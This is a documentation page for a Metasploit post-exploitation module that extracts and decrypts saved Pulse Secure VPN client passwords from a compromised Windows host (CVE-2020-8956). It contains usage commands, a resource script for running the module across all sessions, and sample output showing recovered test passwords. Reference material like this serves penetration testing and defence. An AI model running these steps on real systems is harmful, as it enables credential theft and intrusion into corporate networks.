Windows Pulse Secure Connect Client Saved Password Extractor - Metasploit
This page contains detailed information about how to use the post/windows/gather/credentials/pulse_secure metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
- Module Overview
- Knowledge Base
- Vulnerable Application
- Verification Steps
- Scenarios
- Pulse Secure 9.0.4 on Microsoft Windows 10 Enterprise 19042
- Pulse Secure 9.0.5 on Microsoft Windows 10 Enterprise 19042
- Pulse Secure 9.0.5 on Microsoft Windows 10 Enterprise 19042 (Elevated)
- Pulse Secure 9.1.3 on Microsoft Windows 10 Enterprise 19042
- Pulse Secure 9.1.4 on Microsoft Windows 10 Enterprise 19042
- Pulse Secure 9.1.4 on Microsoft Windows 10 Enterprise 19042 (Elevated)
- Host without Pulse Secure
- References
- Msfconsole Usage
- Error Messages
- Related Pull Requests
- References
- See Also
- Authors
- Version
Module Overview
Name: Windows Pulse Secure Connect Client Saved Password Extractor
Module: post/windows/gather/credentials/pulse_secure
Source code: modules/post/windows/gather/credentials/pulse_secure.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2020-8956
This module extracts and decrypts saved Pulse Secure Connect Client passwords from the Windows Registry. This module can only access credentials created by the user that the Meterpreter session is running as. Note that this module cannot link the password to a username unless the Meterpreter sessions is running as SYSTEM. This is because the username associated with a password is saved in 'C:\ProgramData\Pulse Secure\ConnectionStore[SID].dat', which is only readable by SYSTEM. Note that for enterprise deployment, this username is almost always the domain username.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/credentials/pulse_secure
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/credentials/pulse_secure
msf post(pulse_secure) > show options
... show and set options ...
msf post(pulse_secure) > set SESSION session-id
msf post(pulse_secure) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/credentials/pulse_secure")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
Pulse Secure VPN Client for versions 9.1 prior to 9.1R4 and 9.0 prior to 9.0R5.
An end-to-end setup with working Juniper Pulse Secure VPN server, Pulse Secure client on Microsoft Windows, and valid credentials are required for Pulse Secure client to save credentials locally and therefore test this.
Verification Steps
- Get a Meterpreter shell on a Windows machine that has Pulse Secure client installed.
- Load the module:
use post/windows/gather/credentials/pulse_secure
- Set the correct session on the module:
set SESSION *session id*
- Run the module with
run
and enjoy the loot.
Scenarios
The command for all scenarios is the same:
msf > use post/windows/gather/credentials/pulse_secure
msf > set SESSION 1
msf > run
If you wish to run the post module against all sessions from framework, here is how:
- Create the following resource script:
framework.sessions.each_pair do |sid, session| run_single("use post/windows/gather/credentials/pulse_secure") run_single("set SESSION #{sid}") run_single("run") end
- At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Pulse Secure 9.0.4 on Microsoft Windows 10 Enterprise 19042
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.0.4.1731.
[+] This version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*] Username:
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
[*] Source: user
[*] Post module execution completed
Pulse Secure 9.0.5 on Microsoft Windows 10 Enterprise 19042
With leftovers from previously installed version (9.0.4):
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[+] Account found
[*] Username:
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
[*] Source: user
[*] Post module execution completed
Without any leftovers from previously installed versions:
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[*] Post module execution completed
Pulse Secure 9.0.5 on Microsoft Windows 10 Enterprise 19042 (Elevated)
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[+] You're executing from a privileged process so this version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*] Username: [email protected]
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
[*] Source: user
[*] Post module execution completed
Pulse Secure 9.1.3 on Microsoft Windows 10 Enterprise 19042
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.1.3.1313.
[+] This version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*] Username:
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
[*] Source: user
[*] Post module execution completed
Pulse Secure 9.1.4 on Microsoft Windows 10 Enterprise 19042
With leftovers from previously installed version (9.1.3):
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[+] Account found
[*] Username:
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
[*] Source: user
[*] Post module execution completed
Without leftovers:
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[*] Post module execution completed
Pulse Secure 9.1.4 on Microsoft Windows 10 Enterprise 19042 (Elevated)
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[+] You're executing from a privileged process so this version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*] Username: [email protected]
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
[*] Source: user
[*] Post module execution completed
Host without Pulse Secure
msf6 post(windows/gather/credentials/pulse_secure) > run
[-] Pulse Secure Connect client is not installed on this system
[*] Post module execution completed
References
- https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials
- https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601
Go back to menu.
Msfconsole Usage
Here is how the windows/gather/credentials/pulse_secure post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/credentials/pulse_secure
msf6 post(windows/gather/credentials/pulse_secure) > show info
Name: Windows Pulse Secure Connect Client Saved Password Extractor
Module: post/windows/gather/credentials/pulse_secure
Platform: Windows
Arch:
Rank: Normal
Provided by:
Quentin Kaiser <[email protected]>
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module extracts and decrypts saved Pulse Secure Connect Client
passwords from the Windows Registry. This module can only access
credentials created by the user that the Meterpreter session is
running as. Note that this module cannot link the password to a
username unless the Meterpreter sessions is running as SYSTEM. This
is because the username associated with a password is saved in
'C:\ProgramData\Pulse Secure\ConnectionStore\[SID].dat', which is
only readable by SYSTEM. Note that for enterprise deployment, this
username is almost always the domain username.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-8956
https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials
https://www.gremwell.com/blog/reversing_pulse_secure_client_credentials_store
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601
Module Options
This is a complete list of options available in the windows/gather/credentials/pulse_secure post exploitation module:
msf6 post(windows/gather/credentials/pulse_secure) > show options
Module options (post/windows/gather/credentials/pulse_secure):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/credentials/pulse_secure post exploitation module:
msf6 post(windows/gather/credentials/pulse_secure) > show advanced
Module advanced options (post/windows/gather/credentials/pulse_secure):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/credentials/pulse_secure module can do:
msf6 post(windows/gather/credentials/pulse_secure) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/credentials/pulse_secure post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/credentials/pulse_secure) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- No credentials were found.
- Pulse Secure Connect client is not installed on this system
- Cannot open Pulse Secure Connect version file.
- You're executing from an unprivileged process so this version is considered safe.
- However, there might be leftovers from previous versions in the registry.
- We recommend running this script in elevated mode to obtain credentials saved by recent versions.
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
No credentials were found.
Here is a relevant code snippet related to the "No credentials were found." error message:
277:
278: def gather_creds
279: print_status('Running credentials acquisition.')
280: ives = find_creds
281: if ives.empty?
282: print_status('No credentials were found.')
283: end
284: return unless ives.any?
285:
286: ives.each do |ive|
287: ive['creds'].each do |creds|
Pulse Secure Connect client is not installed on this system
Here is a relevant code snippet related to the "Pulse Secure Connect client is not installed on this system" error message:
347: #
348: def check
349: version_path = 'C:\\Program Files (x86)\\Pulse Secure\\Pulse\\versionInfo.ini'
350: begin
351: if !session.fs.file.exist?(version_path)
352: print_error('Pulse Secure Connect client is not installed on this system')
353: return Msf::Exploit::CheckCode::Safe
354: end
355: version_file = begin
356: session.fs.file.open(version_path)
357: rescue StandardError
Cannot open Pulse Secure Connect version file.
Here is a relevant code snippet related to the "Cannot open Pulse Secure Connect version file." error message:
356: session.fs.file.open(version_path)
357: rescue StandardError
358: nil
359: end
360: if version_file.nil?
361: print_error('Cannot open Pulse Secure Connect version file.')
362: return Msf::Exploit::CheckCode::Unknown
363: end
364: version_data = version_file.read.to_s
365: version_file.close
366: matches = version_data.scan(/DisplayVersion=([0-9.]+)/m)
You're executing from an unprivileged process so this version is considered safe.
Here is a relevant code snippet related to the "You're executing from an unprivileged process so this version is considered safe." error message:
374: if is_system?
375: print_good("You're executing from a privileged process so this version is considered vulnerable.")
376: return Msf::Exploit::CheckCode::Vulnerable
377: end
378:
379: print_warning("You're executing from an unprivileged process so this version is considered safe.")
380: print_warning('However, there might be leftovers from previous versions in the registry.')
381: print_warning('We recommend running this script in elevated mode to obtain credentials saved by recent versions.')
382: return Msf::Exploit::CheckCode::Appears
383: rescue Rex::Post::Meterpreter::RequestError => e
384: vprint_error(e.message)
However, there might be leftovers from previous versions in the registry.
Here is a relevant code snippet related to the "However, there might be leftovers from previous versions in the registry." error message:
375: print_good("You're executing from a privileged process so this version is considered vulnerable.")
376: return Msf::Exploit::CheckCode::Vulnerable
377: end
378:
379: print_warning("You're executing from an unprivileged process so this version is considered safe.")
380: print_warning('However, there might be leftovers from previous versions in the registry.')
381: print_warning('We recommend running this script in elevated mode to obtain credentials saved by recent versions.')
382: return Msf::Exploit::CheckCode::Appears
383: rescue Rex::Post::Meterpreter::RequestError => e
384: vprint_error(e.message)
385: end
We recommend running this script in elevated mode to obtain credentials saved by recent versions.
Here is a relevant code snippet related to the "We recommend running this script in elevated mode to obtain credentials saved by recent versions." error message:
376: return Msf::Exploit::CheckCode::Vulnerable
377: end
378:
379: print_warning("You're executing from an unprivileged process so this version is considered safe.")
380: print_warning('However, there might be leftovers from previous versions in the registry.')
381: print_warning('We recommend running this script in elevated mode to obtain credentials saved by recent versions.')
382: return Msf::Exploit::CheckCode::Appears
383: rescue Rex::Post::Meterpreter::RequestError => e
384: vprint_error(e.message)
385: end
386: end
Go back to menu.
Related Pull Requests
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #14769 Merged Pull Request: Handle nil versions in preparation for rubygems 4
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14314 Merged Pull Request: [CVE-2020-8956] Pulse Secure Connect Client Credentials Gatherer
References
- CVE-2020-8956
- https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials
- https://www.gremwell.com/blog/reversing_pulse_secure_client_credentials_store
- https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601
See Also
Check also the following modules related to this module:
- post/windows/gather/credentials/aim
- post/windows/gather/credentials/avira_password
- post/windows/gather/credentials/bulletproof_ftp
- post/windows/gather/credentials/chrome
- post/windows/gather/credentials/comodo
- post/windows/gather/credentials/coolnovo
- post/windows/gather/credentials/coreftp
- post/windows/gather/credentials/credential_collector
- post/windows/gather/credentials/digsby
- post/windows/gather/credentials/domain_hashdump
- post/windows/gather/credentials/dynazip_log
- post/windows/gather/credentials/dyndns
- post/windows/gather/credentials/enum_cred_store
- post/windows/gather/credentials/enum_laps
- post/windows/gather/credentials/enum_picasa_pwds
- post/windows/gather/credentials/epo_sql
- post/windows/gather/credentials/filezilla_server
- post/windows/gather/credentials/flashfxp
- post/windows/gather/credentials/flock
- post/windows/gather/credentials/ftpnavigator
- post/windows/gather/credentials/ftpx
- post/windows/gather/credentials/gadugadu
- post/windows/gather/credentials/gpp
- post/windows/gather/credentials/heidisql
- post/windows/gather/credentials/icq
- post/windows/gather/credentials/idm
- post/windows/gather/credentials/ie
- post/windows/gather/credentials/imail
- post/windows/gather/credentials/imvu
- post/windows/gather/credentials/incredimail
- post/windows/gather/credentials/kakaotalk
- post/windows/gather/credentials/kmeleon
- post/windows/gather/credentials/line
- post/windows/gather/credentials/maxthon
- post/windows/gather/credentials/mcafee_vse_hashdump
- post/windows/gather/credentials/mdaemon_cred_collector
- post/windows/gather/credentials/meebo
- post/windows/gather/credentials/miranda
- post/windows/gather/credentials/moba_xterm
- post/windows/gather/credentials/mremote
- post/windows/gather/credentials/mssql_local_hashdump
- post/windows/gather/credentials/navicat
- post/windows/gather/credentials/nimbuzz
- post/windows/gather/credentials/opera
- post/windows/gather/credentials/operamail
- post/windows/gather/credentials/outlook
- post/windows/gather/credentials/postbox
- post/windows/gather/credentials/purevpn_cred_collector
- post/windows/gather/credentials/qq
- post/windows/gather/credentials/razer_synapse
- post/windows/gather/credentials/razorsql
- post/windows/gather/credentials/rdc_manager_creds
- post/windows/gather/credentials/redis_desktop_manager
- post/windows/gather/credentials/safari
- post/windows/gather/credentials/seamonkey
- post/windows/gather/credentials/securecrt
- post/windows/gather/credentials/skype
- post/windows/gather/credentials/smartermail
- post/windows/gather/credentials/smartftp
- post/windows/gather/credentials/spark_im
- post/windows/gather/credentials/srware
- post/windows/gather/credentials/sso
- post/windows/gather/credentials/steam
- post/windows/gather/credentials/tango
- post/windows/gather/credentials/teamviewer_passwords
- post/windows/gather/credentials/thunderbird
- post/windows/gather/credentials/thycotic_secretserver_dump
- post/windows/gather/credentials/tlen
- post/windows/gather/credentials/tortoisesvn
- post/windows/gather/credentials/total_commander
- post/windows/gather/credentials/trillian
- post/windows/gather/credentials/viber
- post/windows/gather/credentials/vnc
- post/windows/gather/credentials/windows_autologin
- post/windows/gather/credentials/windowslivemail
- post/windows/gather/credentials/windows_sam_hivenightmare
- post/windows/gather/credentials/winscp
- post/windows/gather/credentials/wsftp_client
- post/windows/gather/credentials/xchat
- post/windows/gather/credentials/xshell_xftp_password
Authors
- Quentin Kaiser <kaiserquentin[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.